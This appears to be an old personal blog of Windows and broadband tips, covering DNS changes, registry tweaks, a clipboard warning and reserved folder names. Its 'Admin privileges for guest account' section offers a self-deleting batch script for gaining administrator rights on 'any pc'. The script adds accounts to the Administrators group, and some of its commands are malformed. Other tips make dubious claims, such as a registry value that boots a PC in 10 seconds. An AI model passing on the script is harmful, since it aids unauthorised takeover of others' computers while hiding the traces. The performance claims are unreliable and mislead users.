Wednesday, June 2, 2010

Speed Up BSNL Dataone Broadband Connection

Trick 1:
1. Open Control Panel -> Networking and Sharing Center -> Manage Network Connection.

2. Now a window showing all networks will be opened. Select BSNL Connection -> Right click -> Properties.
3. Now, double click on Internet Protocol Version(TCP/IPv4) and in newly opened window at bottom, select “Use the following DNS Server address” .
4. And fill these 2 DNS Addresses in two fields:
208.67.222.222
208.67.220.220
and hit OK. Thats it. Your BSNL Internet Broadband DNS Servers changed.

Trick 2:
Firefox users can use FlashBlock extension to prevent downloading of Flash content by default, thereby significantly speeding up browsing experience. You can click on the placeholder icon to display the original Flash content any time. This is more of a passive tip in that reduces data usage to improve your overall experience.

Wednesday, March 31, 2010

Danger of "CTRL+C" on web

We do copy various data by ctrl+c for pasting elsewhere. This copied data is stored in clipboard and is accessible from the net by a combination of Javascripts and ASP.Just try this:
1) Copy any text by 'ctrl+c'
2) Do not keep sensitive data (like passwords, reditcard numbers, PIN etc.) in the clipboard while surfing the web. It is extremely easy to extract the text stored in the clipboard to steal your sensitive information.
To avoid Clipboard Hack Problem, do the following:
1) In Internet Explorer, Go to Tools -> Internet options -> Security
2) Press Custom level.
3) In the security settings, select disable under Allow paste operations via script and click on OK. (Now the contents of your clipboard are safe.)

Remove RUN ....

Who wants to delete "RUN"

I really don't know why someone could wish to remove RUN from START MENU, but if you're one of them, you can do that, too.

REGEDIT

HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Policies\Explorer

Double click on "NoRun" and change "ValueData" from 0 to 1.

Close Regedit, and restart computer.

TURN ON UR PC IN JUST 10 SECONDS

Alright so u wanna know how to turn the pc on in 10 seconds(may vary).Here's what u have to do to turn ur pc on in 10 seconds

Click on the start button then press R it will take u to Run well go to run
& type Regedit
press enter
this will open Registery Editor
now look for the key

HKEY_LOACAL_MECHINE\SYSTEM\CurrentControlSet\Control\
ContentIndex

now there find the Key Called
"Startup Delay"
Double Click On It
Now where its Base
Click Decimal
Now its Default Value Is 4800000(75300:hexadecimal)
Change The Value To 40000
here u go u have done it
now close the Registery Editor and Restart Your Computer
You'll See The Result

Admin privileges for guest account in Windows

Want admin privileges on any pc in Guest account??
try this
Copy and paste the code given below in notepad and save it as anyname.bat(not txt)
Then double click on it
This will add u in administrators group
Enjoy.
CODE:-

echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0

Create Folder " CON " in Windows XP

Try to create a folder in Windows with either of these names--
"con" or "nul" or "Aux" or "Lpt1".Windows will not let u create ....
Reason: all this correspond to some of the famous ports
>con corresponds to the console
>Lpt1 corresponds to printer and so on....
HOWEVER I FOUND A TRICK TO CREAT FOLDER "CON"
Here is a simple method..........
Rename folder from the right click option........
Now press alt and press 255...
press 255 frm the right sideof the key bords i.e., num pad....
where only numbers r given.....
now write con and then press enter!!
you ll see a con folder in ur pc and also you can delete it easily.

Tuesday, June 2, 2009

Clearing the Windows XP Run command's most recently used list

Process No-1

You can also right-click the Start button, click on Properties, click on Customize, then click on Clear. The Run command cache will be gone!


Process No-2

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU as a series of values a-z. To delete an entry from the run menu perform the following:

Start the registry editor (regedit.exe)
Move to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
Select the entry you wish to remove, e.g. h
Press the Del key (or select Edit - Delete) and click Yes to the confirmation
Double click the MRUList value and remove the letter you just deleted. Click OK to save the change
Close the registry editor